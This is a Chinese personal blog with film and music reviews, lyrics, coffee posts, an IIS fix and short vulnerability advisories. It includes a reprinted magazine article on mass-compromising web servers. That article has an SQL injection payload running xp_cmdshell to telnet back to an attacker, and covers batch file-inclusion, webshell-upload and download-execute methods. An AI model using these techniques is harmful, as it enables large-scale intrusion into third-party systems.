欢迎访问417的博客

很早以前就看了《卧虎藏龙》，觉得该写点什么，只所以一直没有动手，是因为觉得认识还不够深刻。

今天深夜，又看了一遍《卧》，于是写下这些：

剧情：
《卧》故事情节很简单：剑士李慕白决心退隐江湖，欲将其手中那柄威震武林的青冥剑送给一位知交
的贝勒爷。而即将出嫁的千金小姐玉蛟龙看上了这把剑，仗着有些武功，蒙面盗走宝剑，并执意不还。
李慕白被迫重出江湖，目的是教化这条资质不错的“毒龙”，李慕白最后虽中毒身死，却最终使玉蛟
龙明白，心术的正邪才是习武成功与否的真正所在。

导演：
一件好的艺术作品，不仅仅是体现了作者创作的意图，还透露出了作者的人，毕竟艺术是人类感情的
产物。《卧》戏全篇节奏紧凑、张驰有致，寓意深刻，戏里戏外处处渗透着儒家思想，没有中华民族
传统文化的底蕴是不会有这么好的作品。

李慕白：
导演李安在戏中把李慕白的儒家风度表现的淋漓尽致，入木三分，引用影评的话说“李慕白是一名侠
客，武功之高不在话下，但导演着墨在一个“侠”字。周润发饰演的李慕白不是通常武侠片中火爆的
烈火男儿，而是无论在白天、黑夜，丛林中还是厅堂下，言行招式都不落一尘，磊落大义，却又不矫
揉造作。对弑师逆贼“碧眼狐狸”毫不手软，对蛮横、顽固、亟需点拨的玉蛟龙百般宽容教导，对倾
心一生的女人俞秀莲不越雷池半步，因为因她丈夫生前是李如手足般的生死之交。”。李慕白是一个
理想化的人物，他只所以入关不能得道，是因为内心还有最爱的人。饰演李慕白的周润发更是人到中
年，演技精进。

玉蛟龙：
玉蛟龙明明是官家小姐，新疆大漠却给予她豪放的性格，这和她的生存环境冲突，也为后来她一再掀
起事端埋下了伏笔。她两偷宝剑，三次与李慕白动手，多次伤人。但就在她得知师父“碧眼狐狸”杀
害的居然是管差时，情绪开始出现波动，小虎到来更让她心性大变，不知天高地厚地想一走了之。所
有这些都把玉蛟龙的聪明、不拘世俗、倔强、狂妄与幼稚的人物性格活生生的表现出来。饰演玉蛟龙
的章子仪在开始表现一般，把握住了人物性格后渐入佳境。

音乐：
《卧》戏在第73届奥斯卡金像奖提名奖中，获得的10项提名包括“最佳原创音乐”及“最佳主题曲”。
影片中如果注意观察就可以发现，很多重要场景都有自己独特的声音，比如松林中的松涛声、新疆乐
器和用琵琶弹奏的主旋律。在此影片中，音乐起了极其重要的作用，影片一开始，就是以马友友凄凉、
沧桑、委婉的大提琴为主线的音乐，马上凝重起来。特别是在玉蛟龙偷剑与俞秀莲夜战一幕，那段鼓
曲更是扣人心弦，那小鼓敲的，真是大鼓透小鼓，小鼓透着嚓，嚓透着腔，腔透着那么一股子精、气、
神~~！！有趣的是，如果没有人提醒，看完影片的人，大多对这段鼓曲印象不是很深刻，这是因为音
乐与激烈的影片片段浑然一体，使你觉得这段音乐本来就应该存在。
大提琴沉重有力，马友友的技术更是精湛，无论是李慕白的死、玉蛟龙跳崖都伴随着深沉的大提琴主
旋律，让人陷入沉思。我不知道片尾曲《月光爱人》原本就配合一段大提琴还是后来加上去的，李纹
一向是走活力路线，在这首歌曲中，却采用了很多民族乐器作为衬托，不仅没有破坏《卧》中原有的
气氛，借助李纹悠扬的歌声，影片的意境得到进一步升华。

动作：
《卧》戏在很多表现轻功的动作中太过造作，最后玉蛟龙跳崖做的也很假。

总的来说，《卧虎藏龙》还是一部非常不错的影片。看完这部影片我的感觉引用戏中李慕白的台词就是：
“我一度进入了一种很深的寂静，……被一种寂灭的悲哀环绕……”

2:22 2005-2-15

经过本人测试发现vmare存在一个本地操作导致崩溃漏洞。

利用某常用软件可以导致vmware进程崩溃，成功触发此漏洞需要用户交互，还不清楚此漏洞是否会导致本地权限提升问题。

受影响版本：

vmware 4.5.2

vmware 5.5.1

vmware player

Advisory Name:
VMware for Windows cash

Release Date:
08/16/2006

Tested on:
VMware 4.5.2 on Windows XP
VMware 5.5.1 on Windows XP
VMware Player on Windows XP

Author:
www417
http://www417.blogchina.com

Overview:
If you use some software operate the file and form vmware to your box, the vmware will show a messagebox tell you send debug-file and cash.

0.5 黑色签字笔

实在受不了 blogchina 服务器的速度和糟糕的内部文章管理系统，于是这几天将所有的文章转移到了新的 blog，以后这里不会再更新。

新的 blog 上会收藏这里几乎所有文章（极个别无意义的文章没有转移），但是发表顺序和时间会错乱，各位看官见谅。

新的 blog 地点： http://hi.baidu.com/3w417

欢迎各位访问。

歌曲：亲爱的你怎么不在身边
歌手：江美琪

这里的空气很新鲜
这里的小吃很特别
这里的latte 不像水
这里的夜景很有感觉
在一万英尺的天边
在有港口view的房间
在讨价还价的商店
在凌晨喧闹的三四点
可是亲爱的你怎么不在我身边
我们有多少时间能浪费
电话再甜美传真再安慰
也不足以应付不能拥抱你的遥远
我的亲爱的你怎么不在我身边
一个人过一天像过一年
海的那一边乌云一整片
我很想为了你快乐一点
可是亲爱的你怎么不在身边
在一万英尺的天边
在有港口view的房间
在讨价还价的商店
在凌晨喧闹的三四点
可是亲爱的你怎么不在我身边
我们有多少时间能浪费
电话再甜美传真再安慰
也不足以应付不能拥抱你的遥远
我的亲爱的你怎么不在我身边
一个人过一天像过一年
海的那一边乌云一整片
我很想为了你快乐一点
可是亲爱的你怎么不在我身边

初中还是高中的时候为了大考开始喝咖啡，后来上瘾了。我是雀巢咖啡的铁杆 FANS，只买雀巢。（听说在国外只有最穷的人才喝雀巢……）

最近 skyline 送了我一大包绿色袋子的咖啡，仔细一看，居然是雀巢，不过怎么没见过北京超市有这样包装的啊，打开一看克数也不一样，忍不住来了一杯……

WOW～！那味道太好了！！！以至于我敢肯定，北京超市卖的雀巢绝对传说中是咖啡渣做的。

以图为证：

除了味道和数量上外，惟一值得宽慰的是，绿袋的是3 in 1（三合一的意思），北京传统的是 1+2，至少还都是三。

PS：咖啡是 skyline 堂妹送的，我一想老放着也不行啊，坏了多可惜啊，我喝也是喝他喝也是喝，我喝还可以把味道好不好告诉他。希望假如那位堂妹不幸看到了这篇 blog 不要发飙。

PS：对了，我有次正喝着堂妹送的咖啡时看见她的照片，心中不由得暗赞一句：“真是咖啡香，不如人美！”。skyline 堂妹非常漂亮，以至于我经常笑问 skyline 是不是小时候长疵了。（“疵”北京地方话，大概可以理解为事情在发展过程中遭遇不可预料的意外而导致失败），他对此问题一概不予回答……

说实话故事情节很老套：

卧底阿力跟着大毒枭昆哥做毒品生意，昆哥身体每况愈下准备将所有生意包括自己小姨子都托付给阿力，但是阿力偶遇一名吸毒女，并与她产生情愫。在取得所有证据后，阿力毅然协助警方将昆哥抓获……

根据我的观察，这几年香港警片已经有了长足的进步，不再是追求暴力、枪战、爱情等单纯因素，而是通过影片突出人性的一些阴暗面和矛盾面，《暗战》系列是这类影片的一个典型，最重要的是影片中将“兵”和“贼”都放在“人”的角度上考虑，通过“兵”来刻画“贼”，通过“贼”来烘托“兵”，通过“兵”和“贼”来探讨“人”。

昆哥的谨慎小心、对阿力的帮助、价值观的错位、为人父为人夫的责任；
阿力的矛盾情绪、对昆哥的情意、对毒品的憎恨与不解；
海关警方的无知、疯狂、对金钱的贪婪、对卧底的不公正待遇；
吸毒女和他老公的充满谎言、空虚、无助与可怜；

一些都是那么真实，毫无掩饰，甚至有些错位，影片真实的再现了毒品世界的恐怖，对社会的伤害。

我个人认为最可惜的是影片开始和结束的时候，那一段对白实在挺肤浅的，至少没有上升到一个让观众深思的高度。

类似的影片推荐《天主之城》

咖啡甜酒和甜酒咖啡都是甜酒调配咖啡制作而成。

不同的是咖啡甜酒侧重甜酒，甜酒咖啡主体则是咖啡。（以上两句似乎相当绕口）

我比较喜欢咖啡甜酒，因为喜欢咖啡，但是在酒吧不来点酒水好像有些格格不入，所以酒精度数较低的咖啡甜酒正适合我这等狂热咖啡崇拜与酒精入门级的人物。

我在google上查到关于咖啡甜酒的一个美丽故事：

百利甜的发祥地在英国。那里有一位著名的调酒师，调酒师的太太是一名出色的女性，他们彼此深爱着对方。有一天，很不幸，调酒师的太太死于一次意外。调酒师从此悲伤，过着孤单的生活。直到一次出行的飞机上，调酒师遇到了一位像极了他前妻的空姐。他仿佛重获新生，一切生命的希望再一次点燃。那以后，调酒师疯狂的追求着那位空姐。但是空姐并不能接受调酒师的爱，空姐对调酒师说，有时候人的心会被蒙住，你对你前妻的思念和对我的爱完全是不同的情感，就像是奶和威士忌永远无法混在一起。调酒师听完空姐的话，默默的走开。他用了一年的时间，终于将奶和威士忌相溶，而且加了蜂蜜使味道也混为一体，并起了一个好听的名字(Baileys Rock)，以此证明他对空姐的爱。当他知道空姐终于肯品尝这第一杯Baileys Rock时，忍不住在杯里加上了一滴眼泪。后来百利甜被空姐带上飞机，传播到世界各地，她对每一个喜欢喝百利甜的人说，“这杯酒，我等了一年”。

百利甜是由新鲜的爱尔兰奶油和上等的爱尔兰whiskey调混而成，带有芳香的巧克力味道，香滑细腻。也有人说它像爱情，冰凉的巧克力奶油~甜蜜~诱人~却一点都不会觉得腻。并且还有点威士忌的刺激。

个人建议：
饮用咖啡甜酒最好使用厚底短透明玻璃杯，两块冰块，摇均后饮用。

补充：
后来又在网上发现，有人介绍这酒在澳洲称为接吻酒，所以有一只能充分湿润嘴唇的宽边杯子就显得比较重要了。

再次补充：
后来又发现，其实咖啡甜酒是就纯百利甜，和咖啡没什么关系，但是怎么品尝都有咖啡味啊……

多漂亮的启动画面啊，是用我PPT做的……

回头再作详细说明，下班了……

我想我有一些关于 metasploit 的新想法……

2007.3.21 程序写的差不多了……

2007.3.26 终于支持SSL了，不怕Sniffer，For server and client……

前几天晚上给朋友的系统做了一个简单优化，由于暴力修改了 IWAM_ 和 IUSR_ 两用户密码，导致 IIS 出现异常，在系统日志里面可以查到如下字样：

{3d14228d-fbe1-11d0-995d-00c04fd919c1}

以前也碰到过这样的问题，当时直接卸载了 IIS 重新安装的，今天 GOOGLE 了一下，发现有很多类似问题，解决方法也很简单。

1、net user IWAM_ "Password"

2、adsutil SET w3svc/WAMUserPass "Password"

3、synciwam.vbs -v

之后最好重新启动一下。

发表在黑客防线2007 二月刊上的，这是原稿。

----------------------------------------------------

禁忌的游戏---批量肉鸡获取技巧

by 417
23:57 2007-1-1

//开篇语

本来无意写此类文章，很多原因，首先我不愿意助纣为虐，另外我觉得这些东西实在很无聊又无技术内容。但是我还是写了出来，不会很详细，也不会提供相关危害工具下载，各位能从这篇文章中学到思路自己实现才是正路。

每个人在人生的道路上行走，当你到达一个新的阶段，回望过去，总会为一些事情所懊悔，对自己以前的幼稚叹息。如果是三年前的我一定会利用以下方法HACK无数肉鸡，但是现在不会，有时间不如作些正事，而这些思想早在两、三年前已经有至少两位牛人提醒过我了，这就是思想的差距。

//一、Web 漏洞肉鸡的批量获取

最近几年 Web 漏洞大行其道，再加上 Google 的力量，使一些新手看看录像短时间内过一把 Hacker 的瘾成为现实。

//1、MSSQL SA 权限注射漏洞

这类漏洞危害较大，利用手段却非常简单，如果是特定的某个脚本系统或者脚本可能存在这类漏洞，可以到 google 上搜索关键词得到可能有问题的 URL，利用 Google Search Saver 把所有 URL 保存为纯文本后（何为 Google Search Saver？请看下面广告时间的介绍），利用记事本的替换功能将内容替换如下：

例如可能有漏洞的 URL 是：

http://www.xxx.com/list.asp?id=123

在记事本中替换"list.asp?id="为"list.asp?id=10;use master;exec dbo.xp_cmdshell "telnet IP PORT";--"，这样文本内容就被替换为：

http://www.xxx.com/list.asp?id=10;use master;exec dbo.xp_cmdshell "telnet IP PORT";--123

这种漏洞适合 URL 中有通用的可以进行定位的相同关键词，另外那个可怜的参数123被注释了一般就没问题了，不过具体情况具体分析，最好先实践一下没问题就可以批量处理了。再将制作好的文本导入 Web 漏洞扫描器，之后只需要在那个 IP 的 PORT 看谁连上来就可以了，当然这里只是举一个例子，你完全可以在 URL 中就实现下载、执行等一系列操作。

//2、PHP 远程文件包含漏洞

和 MSSQL SA 权限注射漏洞批量利用的原理一样，只不过到那台你控制的 Web 服务器上看谁访问了你写好的恶意文件就行了。

//3、WebShell 上传漏洞

和 MSSQL SA 权限注射漏洞批量利用的原理一样，只不过需要写点程序，比如前些年动网的那个上传漏洞，抓包搞清楚原理之后，用 Google Search Saver 把搜索到的 upfiles.asp (是这个名字吧？我不记得了)页面地址都保存下，放到 Web 漏洞扫描器中先剔除掉某些 404 错误的，再放到自己写好的批量自动上传程序中，批量处理完毕后，到记事本中替换 upfiles.asp 为你的后门路径和文件名，再导入扫描器，剔除 404 错误的。
看！只一小会儿，这个世界清净了。

//4、敏感文件下载漏洞

这个就更简单了，到 Google 上搜索敏感文件可能存在的 URL，保存为文本后，替换 "http://" 为 "C:\wget http://"。当然这样会出现重名覆盖、文件被重写问题，你可以替换 "http://" 为 "move filename.ext C:\filename-xx.ext & C:\wget http://"，xx是变量，每次都不同，至于怎么产生相信大家各有各自的办法，我的方法是@%(@+)%(*^&@&$@(%。

另外据我所知，有些可爱的下载工具会自动将重名保存的文件名后加数字。

//二、远程溢出漏洞肉鸡的批量获取

呵呵，看到这个标题有点兴奋了吧。

//1、DownLoadExec ShellCode

最简单的方法是修改 EXP 的 ShellCode，将原来的 Bind 或者 UserAdd 替换为 DownLoadExec 类型的，之后再利用什么批量溢出程序（我用过一次批量溢出程序，可惜崩溃了……，可能是我不会用……）。

//2、BackConnect Ctrl+V

首先把要执行的命令都写在文本中，一条命令一行，这里就各显神通看基本功了，如果不知道如何写，看看 EVA 的 《Do All In CMD Shell》。当肉鸡命令行反连回来后，只要将文本内容复制到命令行中回车一下即可。至于如何让肉鸡批量反连，我想大家看了上面这么多例子应该有自己的方法了。

//三、总结
//1、基础知识很重要

看完这篇文章希望大家对批处理、 VBS 脚本、命令行参数、管道、重定向会更有兴趣。

//2、深入了解一些东西

Web 漏洞扫描器就真的只能扫描过时漏洞么？还记得 TwwwScan 么？了解你手中的资源，了解你的工具，了解你自己。

//3、小心！“胶水”型后门（病毒）

乍看起来，这个标题似乎和本文没有直接关系，我也是写到这里才临时决定加入这个标题。其实“胶水”型后门（病毒）就存在于我们身边，这类程序利用一些随手可得的小工具加上批处理和特定漏洞攻击工具组成，其特点是灵活、有效、免杀、追踪困难。不要小看这类程序，更不要小看这类程序的作者，他们往往对系统、工具、漏洞细节极其了解，并且有惊人的耐心。

//4、编程才是王道

看了这么多例子，相信大家明白技巧不是技术。

//5、生态平衡与网络安全

社会的基本元素是人，社会的意识可以看做是绝大部分人的意识总和表现；大自然是各种生物和生态的总和，大自然也同样是其组成部分生存状态的表现。网络安全就是一个小的自然环境，而网络安全从业人员就是小的社会，只有社会和生存环境和谐相处，两者才能共同生存。

//6、DO NOT PLAY WHIT THE FIRE !!!

当你制造出自己的批量肉鸡获取程序的时候，你最好知道自己在干什么。有时候一批肉鸡回来被控，一不小心就进了不该进的系统，或者头脑一热 D.D.O.S 一把，但是这个和平时玩玩不同，性质不同。
所以不要散播任何批量获取程序！！！

//广告时间
//1、Google Search Saver

我很久以前写的一个小程序，可以从 google 上搜索并且把结果保留为文本。不过由于时间久远，现在已经不能用了，如图：

http://www417.bokee.com/inc/google3.jpg

//2、肉鸡管理系统

科学的肉鸡管理方式，如图：

http://www417.bokee.com/inc/HostAdmin2007.JPG

//3、感谢

感谢 pskey、envymask 对我的支持，感谢寒夜孤风提供的脚本样本。

受影响系统：

Win2000 Pro (no test)

Win2000 Server (no test)

Win2000 Adv Server

漏洞细节：

偶然发现 Win2000 自带的图像编辑软件 kodakprv.exe 存在缓冲区溢出漏洞。攻击者构建恶意的 jpg 图像文件在 Win2000 系统上使用 kodakprv.exe 打开会触发此溢出。不过这个攻击必须有用户交互才能触发，而且默认 jpg 图片使用 IE 打开，而不是 kodakprv.exe。

利用工具：

暂时没有可用的攻击代码。

春节在家无事，把珍藏的音乐拿出来听，这几盘CD有年头了，是我在大学选修音乐鉴赏的时候买的。其中我最喜欢的是《辛德勒名单》这张。

其中第一曲《theme from schindler's list》主题部分反复的播放时，我每次总能想到很多以前在大学时候的事情，那无忧无虑的生活，阳光照射在操场上的温暖，和她……

如果大家想听，可以从VeryCD上搜索到这张CD。以下是别人关于这张CD的曲目介绍和乐评。

----------------------------------------------------------------------------------------------------

电影《辛德勒名单》原声大碟
CD编号：MCD 10969

01 theme from schindler's list
02 jewish town
03 immolation
04 remembrances
05 schinder's workforce
06 oyf'n prippetshok and nachtaktion
07 I could have done more
08 auschwitz
09 stolen memories
10 making the list
11 give me your names
12 yeroushalaim chel zanav
13 remembrances
14 theme from schinder's list reper

＜辛德勒的名单＞不仅可以说是史匹伯的重大突破，也是约翰．威廉斯一次经典且突破性的转型，威廉斯以本片再次拿下一座奥斯卡最佳原著音乐奖，在威廉斯过去得奖或提名的作品中，虽然不乏史诗风格的作品，但感觉上似乎向来以气势磅礴，力道震撼的华丽气魄见长，而＜辛德勒的名单＞同样深具史诗格局和撼人的情绪力量，但不论是史匹伯的电影，或者是约翰．威廉斯的配乐，都选择了用真挚无华的追思，去思考感受历史伤痛，以及其中所散发的人性力量，特别值得一提的还有以萨．帕尔曼的演出，也使这张原声带成为非常具有代表性的演出版本．

　　约翰．威廉斯不使用他个人善长的大型交响乐，反而以小提琴独奏作为整个音乐的基调，实际上形成了更出色的诠释力，这种音色让整个配乐呈现了温和的怀旧色彩，也贴切的呼应了史匹伯带有纪录片气息的黑白摄影．”感伤”或”哀恸”或许不是形容这部作品最好的字眼，它带给我的感受固然也有一些感伤，但实际上大多数的时候并不全然是如此，它带给我的感觉，固然有对历史悲剧的同情怜悯，但更多的时候，是对生命的强韧与人性的尊严，油然而生的感动．

　　两个主题旋律Theme From Schindler's List和Rememberance，在旋律风格和交响编曲的曲风上，都采取十分平实的气质，但在情绪上却相当深刻，这其中当然也要归功于帕尔曼精湛的独奏演出，小提琴的独语充满了省思和缅怀的温淳气质，不是对人间悲剧的控诉，而是对历史错误的沈思，帕尔曼的表现风格内敛但沈稳深情，威廉斯在交响乐的部分则善尽烘托陪衬的角色，让音乐成为深具说服力和感染力的历史独白．

　　将主题命名为Rememberance，不难感受到，史匹伯和威廉斯并不想以历史秘辛或历史批判的眼光来处理这个题材，不是再去揭开历史的伤口，加深它的痛楚，而是去检视这个事件和它对当事人与时代的影响，并且将这个影响化做忠诚的记录与忠告，传递给不曾经历的人，并希望悲剧不会在历史上重演，这是一个旋律性很优美的主题，提琴独奏版本的凄测自是不在话下，但以弦乐合奏的版本，也另有一番平敛柔和的美感．

　　Theme From Schindler's List以在I Could Have Done More中最为凄恻，描述辛德勒在战争结束后身份沦为战犯，展开逃亡，临行前”辛德勒的犹太人”送给他一只金戒指，上面刻烙”救了一个人等于救了全世界”，这段音乐中，帕尔曼的表现手法流露出相当强烈的情绪煽动力，闻之著实令人动容，影片结束时的终曲Theme From Schindler's List (Reprise)，也是一段相当动人的变奏，主题以静諡的钢琴和舒缓的弦乐，在犹太墓碑的长道上徐徐流动著，这一条屈辱先人的小径，虽然无言而沈默，却让人感受到一个民族的悲伤和坚强，令人百感交集，这段主题变奏虽然没有华丽煽情的摧化手法，但却完美呼应了Rememberance的追思与感念，深刻而绵长．

　　Jewish Town (Krakow Ghetto-Winter '41)是一个带有犹太传统气息的古朴主题，也是这部作品第三个音乐主题，这个主题变化成Schindler's Workforce中的音乐主轴，描述辛德勒游走在法律与利润的边缘，安排犹太人加入他的工厂，辛德勒的行为在历史上留下了感人的一章，但他最初的动机却十分市侩与唯利是图，他的性格中除了商人的现实，也带有一点恻隐的任侠色彩，他的小聪明和狡黠让他发了一笔谈不上是光彩的战争财，却也让他完成了一件伟大的事迹，只是这一路上，固然有人性道德的觉醒，却也有些骑虎难下，无心插柳的无奈，这也是辛德勒这个角色引人玩味之处，他的救人有”为人”也有”为己”的动机，而在整个过程中两者的比例一直在省思调整著，我想这也是为什么这个角色让人更觉得真实的原因，因为史匹伯不曾将他神格化．

　　合唱曲Immolation-With Oure Life , We Give Life是我个人十分喜爱的音乐，Immolation是殉身和牺牲的意思，这段音乐描述纳粹焚烧不计其数，惨遭屠杀的尸骸，焚尸的飞灰甚至足以蔽日，惨绝人寰，但这段音乐透过”With our life , we give life”的悲怆合唱，却形成了一种超脱死亡的胸襟，希望每一个灵魂能获得安息，每一个牺牲有朝一日能昭然于世，成为历史的见证．

　　描述毒气室中与死亡擦身而过Auschwitz-Birkenau，是相当撼人心弦的一幕，也是本片配乐中最精彩的作品之一，帕尔曼的演出是整个作品的灵魂，让人恍如置身于面对死亡的不安与恐惧．而Stolen Memeries以轻柔的合声，描写集中营中被剥夺了的犹太人遗物，这些东西至今仍被保留著，成为历史的见证，史匹伯特别在成堆的生活照片上做了特意的取镜，照片上的每一张面孔，每一个笑容，让人深刻的感受到，纳粹剥夺的并不只是身外之物的财产，而是每个人的生活，记忆与梦想．在末尾以吉他弹奏的主题，描写辛德勒帮助一名犹太女子，从集中营中将她的父母带入他的工厂，辛德勒起初百般不愿，不过最后还是暗中协助这名女子，辛德勒每一次救人都在道德和自身安危的取舍中挣扎，然而始终无法违昧自己的良知．Making The List是一首戏剧性较为强烈的作品，描写辛德勒开始策划收买纳粹，帮助犹太人的”辛德勒的名单”，这个音乐是我个人十分喜爱的一个曲目，在危机中透露著生机，在阴霾中透露著人性的曙光，而辛德勒和秘书间的一席对话也诠释的十分感人．

　　除了威廉斯优美动人的原著作品外，原声带中也收录了使用在电影中的犹太民谣，OYF'N Pripetshok And Nact Aktion在影片中描述辛德勒在纳粹屠城时，看见一名红衣女孩，无助荒谬的穿过无情的杀戮，消失在城市的一角，这一幕撼动了辛德勒心灵深处的不忍和怜悯，成为他记忆中不可抹灭的影像，而后段的音乐以传统犹太乐器Clarinet，塑造出屠杀仍未结束的漫漫长夜．Yeroushalaim Chel Zahav (Jerusalem Of Gold)则以明亮温柔的色调，刻划出”辛德勒的犹太人”重获新生的感慨和骄傲．

　　整体而言，这是一张相当动人的电影原声带，有人曾告诉我，他也很喜欢这张原声带，但有时就是不能那样enjoy其中的感伤，心情很容易就被这样凄楚的音乐影响，所以好像这并不是一张让人随时都想听，或让你保持好心情的作品，不过这也证明这个看以无华平实的音乐作品，却蕰含了很大的情绪感染力，说它是９０年代的电影配乐经典，我想是实至名归的，它也成为威廉斯的作品中，最令人感动与省思的深度钜作．

故事片：辛德勒名单 SCHINDLER'S LIST 1993出品
导演：斯蒂芬·斯皮尔伯格 （Spielberg·Steven） 主演：利亚姆·尼森 （Neeson·Liam）

获奖：第66届奥斯卡最佳影片、 最佳导演、 最佳改编剧本、最佳艺术指导、最佳摄影、最佳电影剪辑六项大奖。

内容：德国投机商人辛德勒是个国社党（即纳粹党）党员。他好女色，会享受，是地方上有名的纳粹中坚分子。他善于利用与关系攫取最大的利润。在被占领的波兰，犹太人是最便宜的劳工。因此，辛德勒的工厂只使用犹太人。然而这些人得到这份工作也就得到了暂时的安全，作为战争产品的生产者而免受屠杀。辛德勒的工厂成了犹太人的避难所。
然而纳粹对犹太人的残酷迫害使辛德勒越来越不满。1943年，纳粹对克拉科夫犹太人的残酷血洗使辛德勒对纳粹的最后一点幻想也破灭了，他清楚纳粹对犹太人的屠杀和奥斯威辛集中营的可怖。从那时起，辛德勒只有一个想法，尽可能多的保护犹太人，使其免受奥斯威辛的死亡。他制定了一份声称工厂正常运转所“必须”的工人名单，通过贿赂纳粹官员，使他们得以幸存下来。他越来越受到违反种族法的怀疑，但他每次都很机智地躲过了迫害，一如既往地不惜冒着生命危险营救犹太人。当运输他的女工的一列火车错开到奥斯威辛时，他还破费了一大笔财产把这些女工又追回了他的工厂。
不久，苏联红军来到了克拉科夫市，向在辛德勒工厂里干活的幸存的犹太人宣布：战争结束了。下大雪的一天晚上，辛德勒向工人们告别，获救的1000多名犹太人为他送行。他们把一份自动发起签名的证词交给了辛德勒，以证明他并非战犯。同时，有人还敲下自己的金牙，打制了一枚金戒子，赠送给辛德勒，在戒子上刻着一句犹太人的名言：救人一命就等于救全人类。辛德勒泪流满面，他为未能救出更多的犹太人而感到痛苦。辛德勒为他的救赎行动，已竭尽所能。他的全部财产都已用于挽救犹太人的生命。大雪之中，犹太人目送辛德勒离开了城市。他的义举将永远被犹太人们铭记在心。

《辛德勒名单》评析
影片《辛德勒名单》是大导演史蒂文·斯皮尔伯格于1993年拍摄的一部轰动世界的宏篇巨制。影片深刻地揭露了德国法西斯屠杀犹太人的恐怖罪行，并以其极高的艺术性成为94年全球最为瞩目的一部影片。其思想的严肃性现非凡的艺术表现力都达到了几乎令人难以超越的深度。影片于1993年12月15日在美国上映，当即引起了轰动，获得了金球奖最佳影片奖和最佳导演奖，并获得了美国导演工会奖。在94年第66届奥斯卡金像奖中，《辛德勒名单》一片毫无争议地夺得了最佳影片、最佳导演、最佳改编剧本、最佳艺术指导、最佳摄影以及最佳电影剪辑等6项金像奖。 对于影片的成就来说，这是当之无愧的。而史蒂文·斯皮尔伯格也以此片第一次夺得了奥斯卡最佳导演奖。对于他的才华来说，这是一份迟到的肯定。
在影片的拍摄过程中，史蒂文·斯皮尔伯格投入了巨大的精力和热情，实际上，影片的改编权和制片权早在1982年就已买下。但直到10年后，影片的拍摄计划才真正得以实行。为了拍摄这部影片，斯皮尔伯格首次放弃了惯用的电影特技，也拒绝请好莱坞影星主演，而是收集了大量的相关资料，请来了当年集中营的幸存者作副导演，并请被辛德勒拯救的犹太人作影片的顾问。斯皮尔伯格耗费了2300万美元就完成了这部长达3小时15分钟的影片，并谢绝了片酬而将全部个人赢利捐献给美国大屠杀博物馆。
作为一个犹太人，拍摄这样的一部影片也是斯皮尔伯格长期以来的心愿。《辛德勒名单》一片虽然是以黑白摄影为主调，但其制作规模却不亚于任何一部彩色大制作的影片。影片共有126个角色，动用了3万名临时演员参与演出。影片情节感人，气势悲壮，而以黑白摄影为主调的纪录片式的拍摄手法更使影片具有了一种极其真实的效果，感人肺腑，发人深思。
影片中电影语言的运用十分出色，在表现犹太人的悲惨遭遇时，有一个镜头中出现了红色，在冲锋队屠杀犹太人的场景中，穿红衣的小女孩与画面形成了极其强烈的对比，产生了极具艺术冲击力的视觉效果，而当小女孩再次出现时，她已经是运尸车上的一具尸体。这一处理手法堪称经典。同时也点明了主人公思想上所受的冲击。对于辛德勒来说，这一小女孩代表了他所有看见的犹太人的不幸，代表了他心理中发生的变化。这一镜头具有的深层内蕴和艺术价值都是足以载入史册的。它的艺术性达到了经典的地位。
当影片进行到犹太人走出集中营，获得自由时，银幕上骤然间大放光明，出现了灿烂的彩色。这一明显的电影语言技巧的运用，起到了极好的效果。由压抑阴沉的黑白两色到丰富的自然色彩，极其形象地尽显了人们解除死亡危险，重获自由后的开朗心情。此时此刻，几乎每个观众都会不由得鼓起掌来。这既是对犹太人获得自由后的欣慰，也是对导演斯皮尔伯格秘作的最高赞赏。
影片的结尾同样具有其感人的艺术魅力。它体现出了犹太人对辛德勒的无限敬意，同时也使影片具有了回顾历史、发人沉思的艺术效果，极大地拓展了影片的表现空间。
《辛德勒名单》一片将作为电影史上永恒的光辉而存在，它是电影史上一部经典的作品。史蒂文·斯皮尔伯格的名字也将与这部影片联系在一起而永远流传下去。

音乐-------抽噎的凡阿林

以前听过这样一个笑谈，是说每年到了奥斯卡入围前后，人们在预测最佳电影音乐奖得主时无一例外地都会下意识地先看看约翰.威廉姆斯今年都干了些什么。如果他老人家恰巧正在渡假的话，那么就表示当年该奖项的竞争将充满悬念。
如同好莱坞绝大多数职业作曲家一样，得到奥斯卡奖就意味着荣誉和地位成比例地增加。不过在老威廉姆斯创作[辛德勒的名单]的配乐之前，他已经凭借[屋顶上的小提琴手]、[大白鲨]、[星球大战]和[E.T]四次染指奥斯卡。[辛德勒的名单]这部永恒的经典除了对电影发展史意义特殊以外，对约翰.威廉姆斯个人的艺术追求来说也意味着一次质变。早期威廉姆斯善于用音符勾勒出一种欢快激昂的个性曲线，比如令人热血沸腾的[星球大战]和[E.T]中的细腻童贞。但在[辛德勒的名单]中，无论是简约的小旋律乐曲还是其所烘托的音乐主题，较之以往都显得极为朴素，恢弘大气的编配也冲淡了约翰.威廉姆斯原有的商业味道。
威廉姆斯是在钢琴上开始这部电影音乐创作过程的。“钢琴已成为我人生中不可或缺的朋友了。”他说，“我需要靠它来进行工作。”后来，在录音棚里，他特意就剧中的音乐进行了一场节奏缓慢的钢琴独奏表演，令在场的人久久难忘。
史蒂文随着这样的音乐发起呆来，他有了另一个念头，“我觉得这些曲子用小提琴演奏的话，效果会更好。”于是，威廉姆斯请来了另一个当今世界著名的小提琴演奏家、大师伊萨克.帕尔曼，并在电话里为帕尔曼演奏了他创作的主题曲，从而打动了这位音乐大师，他答应会到录音棚来亲自演奏这些曲子。
帕尔曼充满想象力的小提琴与威廉姆斯力求平实的创作观念结合在一起，相互抵消了两个人的个性色彩，帕尔曼的肆意变的有些幽怨，威廉姆斯的多愁善感也仿佛带着力道。主题曲《Theme from Schindler`s List》的弦乐背景庄严肃穆，充满神秘感，只有伴随着帕尔曼的小提琴华彩才能令人感到亲近而温暖。接下来的《Jewish Town》通过很轻松的表现手法就能使一切归于平静，用凄美的小提琴表现犹太人的音乐，神圣当然胜过哀伤。
